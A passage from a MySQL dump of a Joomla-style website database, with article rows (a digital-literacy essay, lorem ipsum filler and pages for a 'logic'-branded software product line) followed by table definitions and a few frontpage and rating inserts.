class=\"pull-left\" src=\"images/images-01.jpg\" alt=\"\" /> We’re in a period where the cutting edge of change has moved from the technology to the literacies made possible by the technology.</p>\r\n<p>The future of digital culture – yours, mine, and ours – depends on how well we learn to use the media that have infiltrated, amplified, distracted, enriched, and complicated our lives. I believe that learning to live mindfully in cyber culture is as important to us as a civilization as it is vital to you and me as individuals. The mindful use of digital media doesn’t happen automatically.</p>\r\n<p>Thinking about what you are doing and why you are doing it instead of going through the motions is fundamental to the definition of mindful, whether you are deciding to follow someone on Twitter, shutting the lid of your laptop in class, looking up from your BlackBerry in a meeting, or consciously deciding which links not to click. Although educational institutions have been slow to incorporate digital literacies, practical know-how is available to those who figure out how to find it. This know-how, from the art of growing social capital in virtual communities to the craft of cultivating wiki collaboration, might determine whether life online will drive us to distraction, or augment and broaden our minds.</p>\r\n<p>Those who understand the fundamentals of digital participation, online collaboration, informational credibility testing, and network awareness will be able to exert more control over their own fates than those who lack this lore.</p>','',1,79,'2015-02-02 20:29:50',692,'','2016-02-28 11:16:00',692,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"Pork meatball ground round prosciutto. Sirloin bresaola ball tip shank tail porchetta pork boudin filet mignon flank jowl salami. Filet mignon bresaola pork boudin capicola prosciutto. Frankfurter chicken leberkas drumstick ball tip turducken rump spare ribs meatball. Tail salami pork loin ham. Drumstick flank porchetta, hamburger ham swine biltong chicken pancetta. Spare ribs prosciutto t-bone.\",\"quote_author\":\"- John Doe\",\"post_status\":\"\"}',7,2,'','',1,34,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(78,233,'Welcome to the future.','welcome-to-the-future','<p><img class=\"pull-left\" src=\"images/images-05.jpg\" alt=\"\" /> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,79,'2015-02-02 20:29:50',692,'','2016-02-28 11:15:37',692,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',7,1,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(79,235,'Baselogic','baselogic','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,86,'2016-02-28 08:42:00',692,'','2016-02-28 08:42:00',0,0,'0000-00-00 00:00:00','2016-02-28 08:42:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/logo-baselogic.png\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',1,6,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(80,236,'Clientlogic','clientlogic','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,86,'2016-02-28 08:42:33',692,'','2016-02-28 08:43:46',692,0,'0000-00-00 00:00:00','2016-02-28 08:42:33','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/logo-clientlogic.png\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',3,3,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(81,237,'Quotelogic','quotelogic','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,86,'2016-02-28 08:43:03',692,'','2016-02-28 08:43:03',0,0,'0000-00-00 00:00:00','2016-02-28 08:43:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/logo-quotelogic.png\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',1,5,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(82,238,'Replogic','replogic','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,86,'2016-02-28 08:43:21',692,'','2016-02-28 08:43:21',0,0,'0000-00-00 00:00:00','2016-02-28 08:43:21','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/logo-replogic.png\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',1,4,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(83,239,'Tradelogic','tradelogic','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,86,'2016-02-28 08:44:07',692,'','2016-02-28 08:44:07',0,0,'0000-00-00 00:00:00','2016-02-28 08:44:07','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/logo-tradelogic.png\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',1,2,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(84,240,'Weblogic','weblogic','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,86,'2016-02-28 08:44:24',692,'','2016-02-28 08:44:24',0,0,'0000-00-00 00:00:00','2016-02-28 08:44:24','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/logo-weblogic.png\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',1,1,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(85,241,'Saleslogic','saleslogic','<p><img class=\"pull-center\" style=\"display: block; margin-left: auto; margin-right: auto;\" src=\"images/logo-saleslogic.png\" alt=\"\" /></p>\r\n<p class=\"biggertext\" style=\"text-align: center;\">Saleslogic, our flagship product suite consists of a family of products, designed for customers who wish to manage their sales information, stock data, pricing, customer accounts and sales resources from a central location and have it readily available across multiple digital platforms.</p>\r\n<p><img src=\"images/bracket.gif\" alt=\"\" width=\"100%\" height=\"auto\" /></p>','',1,86,'2016-02-28 08:45:35',692,'','2016-02-28 09:10:26',692,0,'0000-00-00 00:00:00','2016-02-28 08:45:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',3,0,'','',1,12,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','');
/*!40000 ALTER TABLE `atlyh_content` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_content_frontpage`
--
DROP TABLE IF EXISTS `atlyh_content_frontpage`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_content_frontpage` (
`content_id` int(11) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_content_frontpage`
--
LOCK TABLES `atlyh_content_frontpage` WRITE;
/*!40000 ALTER TABLE `atlyh_content_frontpage` DISABLE KEYS */;
INSERT INTO `atlyh_content_frontpage` VALUES (8,3),(24,2),(35,5),(50,4),(85,1);
/*!40000 ALTER TABLE `atlyh_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_content_rating`
--
DROP TABLE IF EXISTS `atlyh_content_rating`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_content_rating` (
`content_id` int(11) NOT NULL DEFAULT 0,
`rating_sum` int(10) unsigned NOT NULL DEFAULT 0,
`rating_count` int(10) unsigned NOT NULL DEFAULT 0,
`lastip` varchar(50) NOT NULL DEFAULT '',
PRIMARY KEY (`content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_content_rating`
--
LOCK TABLES `atlyh_content_rating` WRITE;
/*!40000 ALTER TABLE `atlyh_content_rating` DISABLE KEYS */;
INSERT INTO `atlyh_content_rating` VALUES (72,5,1,'::1'),(73,5,1,'::1'),(74,4,1,'::1'),(75,4,1,'::1'),(78,4,1,'::1');
/*!40000 ALTER TABLE `atlyh_content_rating` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_content_types`
--
DROP TABLE IF EXISTS `atlyh_content_types`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_content_types` (
`type_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`type_title` varchar(255) NOT NULL DEFAULT '',
`type_alias` varchar(255) NOT NULL DEFAULT '',
`table` varchar(255) NOT NULL DEFAULT '',
`rules` text NOT NULL,
`field_mappings` text NOT NULL,
`router` varchar(255) NOT NULL DEFAULT '',
`content_history_options` varchar(5120) DEFAULT NULL COMMENT 'JSON string for com_contenthistory options',
PRIMARY KEY (`type_id`),
KEY `idx_alias` (`type_alias`)
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
